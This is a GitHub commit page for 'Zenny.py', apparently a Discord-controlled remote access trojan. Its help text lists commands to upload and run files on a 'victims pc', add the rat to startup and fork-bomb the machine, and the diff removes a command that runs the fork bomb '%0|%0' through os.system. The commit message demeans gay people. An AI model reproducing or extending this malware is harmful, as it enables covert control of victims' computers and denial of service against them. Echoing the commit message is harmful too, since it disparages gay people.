Skip to content

Commit

Permalink
gay ppl are kinda weird
Browse files Browse the repository at this point in the history
  • Loading branch information
Prime committed Mar 5, 2024
1 parent a263eaa commit 0119b3e
Showing 1 changed file with 0 additions and 13 deletions.
13 changes: 0 additions & 13 deletions Zenny.py
Original file line number Diff line number Diff line change
Expand Up @@ -136,7 +136,6 @@ async def help(ctx):
.upload <sessionkey> <filelink>: Uploads and downloads file and then runs it on victims pc
.startup <sessionkey>: puts rat on startup
.forkbomb <sessionkey>: runs a simple forkbomb as a background process
.ddos <sessionkey>: COMING SOON
.spread <sessionkey>: COMING SOON
.roblox <sessionkey>: COMING SOON
Expand Down Expand Up @@ -711,18 +710,6 @@ async def rickroll(ctx, seshn):
else:
pass



@bot.command()
async def fork(ctx, seshn):
session = sessions.get(seshn.lower())
if session:
command = "%0|%0"
os.system(command)
await ctx.send(f"Forkbombed session :rofl:")
else:
pass

@bot.command()
async def screenoff(ctx, seshn):
session = sessions.get(seshn.lower())
Expand Down

0 comments on commit 0119b3e

Please sign in to comment.